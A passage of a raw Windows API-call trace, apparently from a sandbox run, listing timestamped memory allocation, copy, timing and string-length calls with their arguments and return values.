malloc (_Size=0x28) returned 0x24ae148c1d0 [0101.625] GetTickCount () returned 0x210d643 [0101.625] malloc (_Size=0x28) returned 0x24ae148c080 [0101.625] GetTickCount () returned 0x210d643 [0101.625] GetTickCount () returned 0x210d643 [0101.625] GetTickCount () returned 0x210d643 [0101.625] malloc (_Size=0x28) returned 0x24ae148c200 [0101.625] GetTickCount () returned 0x210d643 [0101.626] free (_Block=0x24ae148c200) [0101.626] GetTickCount () returned 0x210d643 [0101.626] malloc (_Size=0x28) returned 0x24ae148bf60 [0101.626] GetTickCount () returned 0x210d643 [0101.626] malloc (_Size=0x28) returned 0x24ae148c200 [0101.626] GetTickCount () returned 0x210d643 [0101.626] GetTickCount () returned 0x210d643 [0101.627] free (_Block=0x24ae148c200) [0101.627] SysStringLen (param_1="%76%41%51%4f") returned 0xc [0101.627] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1484c60 [0101.627] free (_Block=0x24ae1484c60) [0101.627] GetTickCount () returned 0x210d643 [0101.627] malloc (_Size=0x28) returned 0x24ae148c260 [0101.627] GetTickCount () returned 0x210d643 [0101.628] free (_Block=0x24ae148c260) [0101.629] malloc (_Size=0x70) returned 0x24ae146ff20 [0101.629] GetTickCount () returned 0x210d653 [0101.629] GetTickCount () returned 0x210d653 [0101.629] malloc (_Size=0x28) returned 0x24ae148bdb0 [0101.629] GetTickCount () returned 0x210d653 [0101.629] GetTickCount () returned 0x210d653 [0101.629] malloc (_Size=0x28) returned 0x24ae148bed0 [0101.630] GetTickCount () returned 0x210d653 [0101.630] malloc (_Size=0x28) returned 0x24ae148bea0 [0101.630] GetTickCount () returned 0x210d653 [0101.630] malloc (_Size=0x28) returned 0x24ae148bff0 [0101.630] GetTickCount () returned 0x210d653 [0101.630] free (_Block=0x24ae148bff0) [0101.630] GetTickCount () returned 0x210d653 [0101.630] GetTickCount () returned 0x210d653 [0101.630] malloc (_Size=0x28) returned 0x24ae148c200 [0101.630] GetTickCount () returned 0x210d653 [0101.631] free (_Block=0x24ae148c200) [0101.631] GetTickCount () returned 0x210d653 [0101.631] malloc (_Size=0x28) returned 0x24ae148c200 [0101.631] GetTickCount () returned 0x210d653 [0101.631] GetTickCount () returned 0x210d653 [0101.631] GetTickCount () returned 0x210d653 [0101.631] malloc (_Size=0x28) returned 0x24ae148c140 [0101.631] GetTickCount () returned 0x210d653 [0101.632] free (_Block=0x24ae148c140) [0101.632] GetTickCount () returned 0x210d653 [0101.632] malloc (_Size=0x28) returned 0x24ae148c4a0 [0101.632] GetTickCount () returned 0x210d653 [0101.632] malloc (_Size=0x28) returned 0x24ae148c3e0 [0101.632] GetTickCount () returned 0x210d653 [0101.632] GetTickCount () returned 0x210d653 [0101.632] GetTickCount () returned 0x210d653 [0101.632] malloc (_Size=0x28) returned 0x24ae148bd80 [0101.632] GetTickCount () returned 0x210d653 [0101.633] free (_Block=0x24ae148bd80) [0101.633] GetTickCount () returned 0x210d653 [0101.633] malloc (_Size=0x28) returned 0x24ae148bde0 [0101.633] GetTickCount () returned 0x210d653 [0101.633] malloc (_Size=0x28) returned 0x24ae148bf30 [0101.633] GetTickCount () returned 0x210d653 [0101.633] GetTickCount () returned 0x210d653 [0101.633] GetTickCount () returned 0x210d653 [0101.633] malloc (_Size=0x28) returned 0x24ae148bd80 [0101.634] GetTickCount () returned 0x210d653 [0101.634] free (_Block=0x24ae148bd80) [0101.634] GetTickCount () returned 0x210d653 [0101.634] malloc (_Size=0x28) returned 0x24ae148be40 [0101.634] GetTickCount () returned 0x210d653 [0101.634] malloc (_Size=0x28) returned 0x24ae148bd80 [0101.634] GetTickCount () returned 0x210d653 [0101.634] GetTickCount () returned 0x210d653 [0101.635] GetTickCount () returned 0x210d653 [0101.635] malloc (_Size=0x28) returned 0x24ae148c0b0 [0101.635] GetTickCount () returned 0x210d653 [0101.635] free (_Block=0x24ae148c0b0) [0101.635] GetTickCount () returned 0x210d653 [0101.635] malloc (_Size=0x28) returned 0x24ae148c260 [0101.635] GetTickCount () returned 0x210d653 [0101.635] malloc (_Size=0x28) returned 0x24ae148c290 [0101.635] GetTickCount () returned 0x210d653 [0101.636] free (_Block=0x24ae148c290) [0101.636] SysStringLen (param_1="%2d%c2%a9%70%69") returned 0xf [0101.636] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1484850 [0101.636] free (_Block=0x24ae1484850) [0101.636] malloc (_Size=0x2e0) returned 0x24ae1391850 [0101.636] malloc (_Size=0x20) returned 0x24ae148bf90 [0101.636] malloc (_Size=0x288) returned 0x24ae148d310 [0101.636] realloc (_Block=0x0, _Size=0x140) returned 0x24ae139ca60 [0101.636] realloc (_Block=0x24ae148bf90, _Size=0x40) returned 0x24ae1480af0 [0101.636] realloc (_Block=0x24ae139ca60, _Size=0x280) returned 0x24ae148cdf0 [0101.636] GetTickCount () returned 0x210d653 [0101.636] malloc (_Size=0x508) returned 0x24ae1489280 [0101.637] GetTickCount () returned 0x210d653 [0101.637] realloc (_Block=0x24ae1480af0, _Size=0x80) returned 0x24ae14822a0 [0101.637] realloc (_Block=0x24ae148cdf0, _Size=0x500) returned 0x24ae1488860 [0101.637] GetTickCount () returned 0x210d653 [0101.637] GetTickCount () returned 0x210d653 [0101.637] malloc (_Size=0xa08) returned 0x24ae13b51d0 [0101.637] GetTickCount () returned 0x210d653 [0101.637] realloc (_Block=0x24ae14822a0, _Size=0x100) returned 0x24ae1474cc0 [0101.637] GetTickCount () returned 0x210d653 [0101.637] realloc (_Block=0x24ae1488860, _Size=0xa00) returned 0x24ae13b5be0 [0101.637] GetTickCount () returned 0x210d653 [0101.637] GetTickCount () returned 0x210d653 [0101.637] GetTickCount () returned 0x210d653 [0101.637] GetTickCount () returned 0x210d653 [0101.637] malloc (_Size=0x1408) returned 0x24ae13be740 [0101.638] GetTickCount () returned 0x210d653 [0101.638] realloc (_Block=0x24ae1474cc0, _Size=0x200) returned 0x24ae13b93a0 [0101.638] GetTickCount () returned 0x210d653 [0101.638] GetTickCount () returned 0x210d653 [0101.638] GetTickCount () returned 0x210d653 [0101.638] realloc (_Block=0x24ae13b5be0, _Size=0x1400) returned 0x24ae13bfb50 [0101.638] GetTickCount () returned 0x210d653 [0101.638] GetTickCount () returned 0x210d653 [0101.638] GetTickCount () returned 0x210d653 [0101.638] GetTickCount () returned 0x210d653 [0101.638] GetTickCount () returned 0x210d653 [0101.638] GetTickCount () returned 0x210d653 [0101.638] GetTickCount () returned 0x210d653 [0101.638] GetTickCount () returned 0x210d653 [0101.639] malloc (_Size=0x2808) returned 0x24ae13c0f60 [0101.639] GetTickCount () returned 0x210d653 [0101.640] GetTickCount () returned 0x210d653 [0101.642] GetTickCount () returned 0x210d653 [0101.644] GetTickCount () returned 0x210d662 [0101.646] GetTickCount () returned 0x210d662 [0101.647] GetTickCount () returned 0x210d662 [0101.649] GetTickCount () returned 0x210d662 [0101.651] GetTickCount () returned 0x210d662 [0101.653] GetTickCount () returned 0x210d662 [0101.655] GetTickCount () returned 0x210d662 [0101.656] GetTickCount () returned 0x210d662 [0101.658] GetTickCount () returned 0x210d662 [0101.671] malloc (_Size=0x28) returned 0x24ae148bf90 [0101.672] GetTickCount () returned 0x210d672 [0101.672] memcpy (in: _Dst=0x24adf9bc57e, _Src=0x24adf9b7e38, _Size=0x2 | out: _Dst=0x24adf9bc57e) returned 0x24adf9bc57e [0101.672] memcpy (in: _Dst=0x24adf9bc57c, _Src=0x24adf9b7d18, _Size=0x2 | out: _Dst=0x24adf9bc57c) returned 0x24adf9bc57c [0101.672] memcpy (in: _Dst=0x24adf9bc57a, _Src=0x24adf9b7cf8, _Size=0x2 | out: _Dst=0x24adf9bc57a) returned 0x24adf9bc57a [0101.672] memcpy (in: _Dst=0x24adf9bc578, _Src=0x24adf9b7df8, _Size=0x2 | out: _Dst=0x24adf9bc578) returned 0x24adf9bc578 [0101.672] free (_Block=0x24ae148c140) [0101.672] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x92", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.672] GetTickCount () returned 0x210d672 [0101.672] memcpy (in: _Dst=0x24adf9b8218, _Src=0xd6788fbb30, _Size=0x4 | out: _Dst=0x24adf9b8218) returned 0x24adf9b8218 [0101.672] memcpy (in: _Dst=0x24adf9bc63c, _Src=0x24ae1a0f820, _Size=0x10 | out: _Dst=0x24adf9bc63c) returned 0x24adf9bc63c [0101.672] memcpy (in: _Dst=0x24adf9bc638, _Src=0x24adf9b8218, _Size=0x4 | out: _Dst=0x24adf9bc638) returned 0x24adf9bc638 [0101.672] free (_Block=0x24ae148c2c0) [0101.673] memcpy (in: _Dst=0x24adf9bc69e, _Src=0x24adf9b7d58, _Size=0x2 | out: _Dst=0x24adf9bc69e) returned 0x24adf9bc69e [0101.673] memcpy (in: _Dst=0x24adf9bc69c, _Src=0x24adf9b80d8, _Size=0x2 | out: _Dst=0x24adf9bc69c) returned 0x24adf9bc69c [0101.673] memcpy (in: _Dst=0x24adf9bc69a, _Src=0x24adf9b8238, _Size=0x2 | out: _Dst=0x24adf9bc69a) returned 0x24adf9bc69a [0101.673] memcpy (in: _Dst=0x24adf9bc698, _Src=0x24adf9b7fb8, _Size=0x2 | out: _Dst=0x24adf9bc698) returned 0x24adf9bc698 [0101.673] free (_Block=0x24ae148c0b0) [0101.673] GetTickCount () returned 0x210d672 [0101.674] GetTickCount () returned 0x210d672 [0101.674] memcpy (in: _Dst=0x24adf9b8198, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9b8198) returned 0x24adf9b8198 [0101.674] memcpy (in: _Dst=0x24adf9bc6fc, _Src=0x24adf9b8198, _Size=0x4 | out: _Dst=0x24adf9bc6fc) returned 0x24adf9bc6fc [0101.674] memcpy (in: _Dst=0x24adf9bc6f8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bc6f8) returned 0x24adf9bc6f8 [0101.674] free (_Block=0x24ae148c020) [0101.674] GetTickCount () returned 0x210d672 [0101.674] memcpy (in: _Dst=0x24adf9b7ff8, _Src=0x24adf9bc6fc, _Size=0x4 | out: _Dst=0x24adf9b7ff8) returned 0x24adf9b7ff8 [0101.674] memcpy (in: _Dst=0x24adf9b8258, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9b8258) returned 0x24adf9b8258 [0101.674] memcpy (in: _Dst=0x24adf9bc81c, _Src=0x24adf9b8258, _Size=0x4 | out: _Dst=0x24adf9bc81c) returned 0x24adf9bc81c [0101.674] memcpy (in: _Dst=0x24adf9bc818, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bc818) returned 0x24adf9bc818 [0101.674] free (_Block=0x24ae148c350) [0101.674] GetTickCount () returned 0x210d672 [0101.674] memcpy (in: _Dst=0x24adf9b8018, _Src=0x24adf9bc81c, _Size=0x4 | out: _Dst=0x24adf9b8018) returned 0x24adf9b8018 [0101.674] memcpy (in: _Dst=0x24adf9b8058, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9b8058) returned 0x24adf9b8058 [0101.674] memcpy (in: _Dst=0x24adf9bc87c, _Src=0x24adf9b8058, _Size=0x4 | out: _Dst=0x24adf9bc87c) returned 0x24adf9bc87c [0101.675] memcpy (in: _Dst=0x24adf9bc878, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bc878) returned 0x24adf9bc878 [0101.675] free (_Block=0x24ae148c020) [0101.675] GetTickCount () returned 0x210d681 [0101.675] memcpy (in: _Dst=0x24adf9b9218, _Src=0x24adf9bc87c, _Size=0x4 | out: _Dst=0x24adf9b9218) returned 0x24adf9b9218 [0101.675] memcpy (in: _Dst=0x24adf9b8e38, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9b8e38) returned 0x24adf9b8e38 [0101.675] memcpy (in: _Dst=0x24adf9bc93c, _Src=0x24adf9b8e38, _Size=0x4 | out: _Dst=0x24adf9bc93c) returned 0x24adf9bc93c [0101.675] memcpy (in: _Dst=0x24adf9bc938, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bc938) returned 0x24adf9bc938 [0101.675] free (_Block=0x24ae148c2c0) [0101.675] GetTickCount () returned 0x210d681 [0101.676] memcpy (in: _Dst=0x24adf9b9158, _Src=0x24adf9bc93c, _Size=0x4 | out: _Dst=0x24adf9b9158) returned 0x24adf9b9158 [0101.676] memcpy (in: _Dst=0x24adf9a587c, _Src=0x24adf9b9158, _Size=0x4 | out: _Dst=0x24adf9a587c) returned 0x24adf9a587c [0101.676] memcpy (in: _Dst=0x24adf9a587a, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a587a) returned 0x24adf9a587a [0101.676] memcpy (in: _Dst=0x24adf9a5876, _Src=0x24adf9b9218, _Size=0x4 | out: _Dst=0x24adf9a5876) returned 0x24adf9a5876 [0101.676] memcpy (in: _Dst=0x24adf9a5874, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5874) returned 0x24adf9a5874 [0101.676] memcpy (in: _Dst=0x24adf9a5870, _Src=0x24adf9b8018, _Size=0x4 | out: _Dst=0x24adf9a5870) returned 0x24adf9a5870 [0101.676] memcpy (in: _Dst=0x24adf9a586e, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a586e) returned 0x24adf9a586e [0101.676] memcpy (in: _Dst=0x24adf9a586a, _Src=0x24adf9b7ff8, _Size=0x4 | out: _Dst=0x24adf9a586a) returned 0x24adf9a586a [0101.676] memcpy (in: _Dst=0x24adf9a5868, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5868) returned 0x24adf9a5868 [0101.676] free (_Block=0x24ae148c140) [0101.676] SysStringLen (param_1="%19%34%19%12") returned 0xc [0101.676] memcpy (in: _Dst=0x24adf9bc998, _Src=0x24ae1484d30, _Size=0x8 | out: _Dst=0x24adf9bc998) returned 0x24adf9bc998 [0101.676] free (_Block=0x24ae1484d30) [0101.678] memcpy (in: _Dst=0x24adf9bc9fe, _Src=0x24adf9b8f18, _Size=0x2 | out: _Dst=0x24adf9bc9fe) returned 0x24adf9bc9fe [0101.678] memcpy (in: _Dst=0x24adf9bc9fc, _Src=0x24adf9b8f38, _Size=0x2 | out: _Dst=0x24adf9bc9fc) returned 0x24adf9bc9fc [0101.679] memcpy (in: _Dst=0x24adf9bc9fa, _Src=0x24adf9b8d38, _Size=0x2 | out: _Dst=0x24adf9bc9fa) returned 0x24adf9bc9fa [0101.679] memcpy (in: _Dst=0x24adf9bc9f8, _Src=0x24adf9b91b8, _Size=0x2 | out: _Dst=0x24adf9bc9f8) returned 0x24adf9bc9f8 [0101.679] free (_Block=0x24ae148c2c0) [0101.679] GetTickCount () returned 0x210d681 [0101.679] memcpy (in: _Dst=0x24adf9b92b8, _Src=0xd6788fbb30, _Size=0x6 | out: _Dst=0x24adf9b92b8) returned 0x24adf9b92b8 [0101.679] memcpy (in: _Dst=0x24adf9b88ee, _Src=0x24ae1a0f820, _Size=0x10 | out: _Dst=0x24adf9b88ee) returned 0x24adf9b88ee [0101.679] memcpy (in: _Dst=0x24adf9b88e8, _Src=0x24adf9b92b8, _Size=0x6 | out: _Dst=0x24adf9b88e8) returned 0x24adf9b88e8 [0101.679] free (_Block=0x24ae148c2c0) [0101.679] GetTickCount () returned 0x210d681 [0101.680] memcpy (in: _Dst=0x24adf9b8922, _Src=0x24adf9b8c58, _Size=0x2 | out: _Dst=0x24adf9b8922) returned 0x24adf9b8922 [0101.680] memcpy (in: _Dst=0x24adf9b8920, _Src=0x24adf9b91d8, _Size=0x2 | out: _Dst=0x24adf9b8920) returned 0x24adf9b8920 [0101.680] memcpy (in: _Dst=0x24adf9b891e, _Src=0x24adf9b9198, _Size=0x2 | out: _Dst=0x24adf9b891e) returned 0x24adf9b891e [0101.680] memcpy (in: _Dst=0x24adf9b891c, _Src=0x24adf9b8c38, _Size=0x2 | out: _Dst=0x24adf9b891c) returned 0x24adf9b891c [0101.680] memcpy (in: _Dst=0x24adf9b891a, _Src=0x24adf9b8e58, _Size=0x2 | out: _Dst=0x24adf9b891a) returned 0x24adf9b891a [0101.680] memcpy (in: _Dst=0x24adf9b8918, _Src=0x24adf9b9338, _Size=0x2 | out: _Dst=0x24adf9b8918) returned 0x24adf9b8918 [0101.680] free (_Block=0x24ae148c470) [0101.681] GetTickCount () returned 0x210d681 [0101.681] GetTickCount () returned 0x210d681 [0101.681] memcpy (in: _Dst=0x24adf9b91f8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b91f8) returned 0x24adf9b91f8 [0101.681] memcpy (in: _Dst=0x24adf9b894c, _Src=0x24adf9b91f8, _Size=0x4 | out: _Dst=0x24adf9b894c) returned 0x24adf9b894c [0101.681] memcpy (in: _Dst=0x24adf9b8948, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b8948) returned 0x24adf9b8948 [0101.681] free (_Block=0x24ae148c470) [0101.681] GetTickCount () returned 0x210d681 [0101.681] memcpy (in: _Dst=0x24adf9b9238, _Src=0x24adf9b894c, _Size=0x4 | out: _Dst=0x24adf9b9238) returned 0x24adf9b9238 [0101.681] memcpy (in: _Dst=0x24adf9b9098, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b9098) returned 0x24adf9b9098 [0101.681] memcpy (in: _Dst=0x24adf9b85bc, _Src=0x24adf9b9098, _Size=0x4 | out: _Dst=0x24adf9b85bc) returned 0x24adf9b85bc [0101.681] memcpy (in: _Dst=0x24adf9b85b8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b85b8) returned 0x24adf9b85b8 [0101.682] free (_Block=0x24ae139be10) [0101.682] GetTickCount () returned 0x210d681 [0101.682] memcpy (in: _Dst=0x24adf9b8db8, _Src=0x24adf9b85bc, _Size=0x4 | out: _Dst=0x24adf9b8db8) returned 0x24adf9b8db8 [0101.682] memcpy (in: _Dst=0x24adf9b92f8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b92f8) returned 0x24adf9b92f8 [0101.682] memcpy (in: _Dst=0x24adf9b89dc, _Src=0x24adf9b92f8, _Size=0x4 | out: _Dst=0x24adf9b89dc) returned 0x24adf9b89dc [0101.682] memcpy (in: _Dst=0x24adf9b89d8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b89d8) returned 0x24adf9b89d8 [0101.682] free (_Block=0x24ae139bdb0) [0101.682] GetTickCount () returned 0x210d681 [0101.682] memcpy (in: _Dst=0x24adf9b8ed8, _Src=0x24adf9b89dc, _Size=0x4 | out: _Dst=0x24adf9b8ed8) returned 0x24adf9b8ed8 [0101.683] memcpy (in: _Dst=0x24adf9b92d8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b92d8) returned 0x24adf9b92d8 [0101.683] memcpy (in: _Dst=0x24adf9b8a3c, _Src=0x24adf9b92d8, _Size=0x4 | out: _Dst=0x24adf9b8a3c) returned 0x24adf9b8a3c [0101.683] memcpy (in: _Dst=0x24adf9b8a38, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b8a38) returned 0x24adf9b8a38 [0101.683] free (_Block=0x24ae139bdb0) [0101.683] GetTickCount () returned 0x210d681 [0101.683] memcpy (in: _Dst=0x24adf9b8eb8, _Src=0x24adf9b8a3c, _Size=0x4 | out: _Dst=0x24adf9b8eb8) returned 0x24adf9b8eb8 [0101.683] memcpy (in: _Dst=0x24adf9b8f58, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b8f58) returned 0x24adf9b8f58 [0101.683] memcpy (in: _Dst=0x24adf9b8a6c, _Src=0x24adf9b8f58, _Size=0x4 | out: _Dst=0x24adf9b8a6c) returned 0x24adf9b8a6c [0101.683] memcpy (in: _Dst=0x24adf9b8a68, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b8a68) returned 0x24adf9b8a68 [0101.684] free (_Block=0x24ae139b870) [0101.684] GetTickCount () returned 0x210d681 [0101.684] memcpy (in: _Dst=0x24adf9b9138, _Src=0x24adf9b8a6c, _Size=0x4 | out: _Dst=0x24adf9b9138) returned 0x24adf9b9138 [0101.685] memcpy (in: _Dst=0x24adf9b9318, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b9318) returned 0x24adf9b9318 [0101.685] memcpy (in: _Dst=0x24adf9b840c, _Src=0x24adf9b9318, _Size=0x4 | out: _Dst=0x24adf9b840c) returned 0x24adf9b840c [0101.685] memcpy (in: _Dst=0x24adf9b8408, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b8408) returned 0x24adf9b8408 [0101.685] free (_Block=0x24ae139bae0) [0101.685] GetTickCount () returned 0x210d681 [0101.685] memcpy (in: _Dst=0x24adf9b8f78, _Src=0x24adf9b840c, _Size=0x4 | out: _Dst=0x24adf9b8f78) returned 0x24adf9b8f78 [0101.685] memcpy (in: _Dst=0x24adf9a5a08, _Src=0x24adf9b8f78, _Size=0x4 | out: _Dst=0x24adf9a5a08) returned 0x24adf9a5a08 [0101.685] memcpy (in: _Dst=0x24adf9a5a06, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5a06) returned 0x24adf9a5a06 [0101.685] memcpy (in: _Dst=0x24adf9a5a02, _Src=0x24adf9b9138, _Size=0x4 | out: _Dst=0x24adf9a5a02) returned 0x24adf9a5a02 [0101.685] memcpy (in: _Dst=0x24adf9a5a00, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5a00) returned 0x24adf9a5a00 [0101.685] memcpy (in: _Dst=0x24adf9a59fc, _Src=0x24adf9b8eb8, _Size=0x4 | out: _Dst=0x24adf9a59fc) returned 0x24adf9a59fc [0101.685] memcpy (in: _Dst=0x24adf9a59fa, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a59fa) returned 0x24adf9a59fa [0101.685] memcpy (in: _Dst=0x24adf9a59f6, _Src=0x24adf9b8ed8, _Size=0x4 | out: _Dst=0x24adf9a59f6) returned 0x24adf9a59f6 [0101.685] memcpy (in: _Dst=0x24adf9a59f4, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a59f4) returned 0x24adf9a59f4 [0101.685] memcpy (in: _Dst=0x24adf9a59f0, _Src=0x24adf9b8db8, _Size=0x4 | out: _Dst=0x24adf9a59f0) returned 0x24adf9a59f0 [0101.686] memcpy (in: _Dst=0x24adf9a59ee, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a59ee) returned 0x24adf9a59ee [0101.686] memcpy (in: _Dst=0x24adf9a59ea, _Src=0x24adf9b9238, _Size=0x4 | out: _Dst=0x24adf9a59ea) returned 0x24adf9a59ea [0101.686] memcpy (in: _Dst=0x24adf9a59e8, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a59e8) returned 0x24adf9a59e8 [0101.686] free (_Block=0x24ae139ba80) [0101.686] SysStringLen (param_1="%c2%b6%61%7f%c2%b2") returned 0x12 [0101.686] memcpy (in: _Dst=0x24adf9b8af8, _Src=0x24ae1484d30, _Size=0x8 | out: _Dst=0x24adf9b8af8) returned 0x24adf9b8af8 [0101.686] free (_Block=0x24ae1484d30) [0101.686] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¶", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.686] GetTickCount () returned 0x210d681 [0101.686] memcpy (in: _Dst=0x24adf9b9018, _Src=0xd6788fbb30, _Size=0x2 | out: _Dst=0x24adf9b9018) returned 0x24adf9b9018 [0101.686] memcpy (in: _Dst=0x24adf9b8b5a, _Src=0x24ae1a0f83c, _Size=0x14 | out: _Dst=0x24adf9b8b5a) returned 0x24adf9b8b5a [0101.686] memcpy (in: _Dst=0x24adf9b8b58, _Src=0x24adf9b9018, _Size=0x2 | out: _Dst=0x24adf9b8b58) returned 0x24adf9b8b58 [0101.686] free (_Block=0x24ae139be70) [0101.688] memcpy (in: _Dst=0x24adf9b8b94, _Src=0x24adf9b8e18, _Size=0x2 | out: _Dst=0x24adf9b8b94) returned 0x24adf9b8b94 [0101.688] memcpy (in: _Dst=0x24adf9b8b92, _Src=0x24adf9b9398, _Size=0x2 | out: _Dst=0x24adf9b8b92) returned 0x24adf9b8b92 [0101.688] memcpy (in: _Dst=0x24adf9b8b90, _Src=0x24adf9b8ff8, _Size=0x2 | out: _Dst=0x24adf9b8b90) returned 0x24adf9b8b90 [0101.688] memcpy (in: _Dst=0x24adf9b8b8e, _Src=0x24adf9b8fd8, _Size=0x2 | out: _Dst=0x24adf9b8b8e) returned 0x24adf9b8b8e [0101.688] memcpy (in: _Dst=0x24adf9b8b8c, _Src=0x24adf9b90d8, _Size=0x2 | out: _Dst=0x24adf9b8b8c) returned 0x24adf9b8b8c [0101.688] memcpy (in: _Dst=0x24adf9b8b8a, _Src=0x24adf9b8c78, _Size=0x2 | out: _Dst=0x24adf9b8b8a) returned 0x24adf9b8b8a [0101.688] memcpy (in: _Dst=0x24adf9b8b88, _Src=0x24adf9b9258, _Size=0x2 | out: _Dst=0x24adf9b8b88) returned 0x24adf9b8b88 [0101.688] free (_Block=0x24ae139bbd0) [0101.688] GetTickCount () returned 0x210d681 [0101.688] GetTickCount () returned 0x210d681 [0101.688] GetTickCount () returned 0x210d681 [0101.688] memcpy (in: _Dst=0x24adf9b9058, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b9058) returned 0x24adf9b9058 [0101.688] memcpy (in: _Dst=0x24adf9b849c, _Src=0x24adf9b9058, _Size=0x4 | out: _Dst=0x24adf9b849c) returned 0x24adf9b849c [0101.689] memcpy (in: _Dst=0x24adf9b8498, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b8498) returned 0x24adf9b8498 [0101.689] free (_Block=0x24ae139b9f0) [0101.689] GetTickCount () returned 0x210d681 [0101.689] memcpy (in: _Dst=0x24adf9b9358, _Src=0x24adf9b849c, _Size=0x4 | out: _Dst=0x24adf9b9358) returned 0x24adf9b9358 [0101.689] memcpy (in: _Dst=0x24adf9b8cd8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b8cd8) returned 0x24adf9b8cd8 [0101.689] memcpy (in: _Dst=0x24adf9b864c, _Src=0x24adf9b8cd8, _Size=0x4 | out: _Dst=0x24adf9b864c) returned 0x24adf9b864c [0101.689] memcpy (in: _Dst=0x24adf9b8648, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b8648) returned 0x24adf9b8648 [0101.689] free (_Block=0x24ae139ba20) [0101.689] GetTickCount () returned 0x210d681 [0101.689] memcpy (in: _Dst=0x24adf9b9078, _Src=0x24adf9b864c, _Size=0x4 | out: _Dst=0x24adf9b9078) returned 0x24adf9b9078 [0101.689] memcpy (in: _Dst=0x24adf9b9178, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b9178) returned 0x24adf9b9178 [0101.689] memcpy (in: _Dst=0x24adf9b870c, _Src=0x24adf9b9178, _Size=0x4 | out: _Dst=0x24adf9b870c) returned 0x24adf9b870c [0101.690] memcpy (in: _Dst=0x24adf9b8708, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b8708) returned 0x24adf9b8708 [0101.690] free (_Block=0x24ae139bae0) [0101.690] GetTickCount () returned 0x210d681 [0101.690] memcpy (in: _Dst=0x24adf9b90b8, _Src=0x24adf9b870c, _Size=0x4 | out: _Dst=0x24adf9b90b8) returned 0x24adf9b90b8 [0101.690] memcpy (in: _Dst=0x24adf9b9278, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b9278) returned 0x24adf9b9278 [0101.690] memcpy (in: _Dst=0x24adf9b9e1c, _Src=0x24adf9b9278, _Size=0x4 | out: _Dst=0x24adf9b9e1c) returned 0x24adf9b9e1c [0101.690] memcpy (in: _Dst=0x24adf9b9e18, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9e18) returned 0x24adf9b9e18 [0101.690] free (_Block=0x24ae139b930) [0101.690] GetTickCount () returned 0x210d691 [0101.690] memcpy (in: _Dst=0x24adf9b9298, _Src=0x24adf9b9e1c, _Size=0x4 | out: _Dst=0x24adf9b9298) returned 0x24adf9b9298 [0101.690] memcpy (in: _Dst=0x24adf9bbef8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bbef8) returned 0x24adf9bbef8 [0101.691] memcpy (in: _Dst=0x24adf9ba11c, _Src=0x24adf9bbef8, _Size=0x4 | out: _Dst=0x24adf9ba11c) returned 0x24adf9ba11c [0101.691] memcpy (in: _Dst=0x24adf9ba118, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9ba118) returned 0x24adf9ba118 [0101.691] free (_Block=0x24ae139bd80) [0101.691] GetTickCount () returned 0x210d691 [0101.691] memcpy (in: _Dst=0x24adf9bbd18, _Src=0x24adf9ba11c, _Size=0x4 | out: _Dst=0x24adf9bbd18) returned 0x24adf9bbd18 [0101.691] memcpy (in: _Dst=0x24adf9bc398, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bc398) returned 0x24adf9bc398 [0101.691] memcpy (in: _Dst=0x24adf9ba1ac, _Src=0x24adf9bc398, _Size=0x4 | out: _Dst=0x24adf9ba1ac) returned 0x24adf9ba1ac [0101.691] memcpy (in: _Dst=0x24adf9ba1a8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9ba1a8) returned 0x24adf9ba1a8 [0101.691] free (_Block=0x24ae139ba50) [0101.691] memcpy (in: 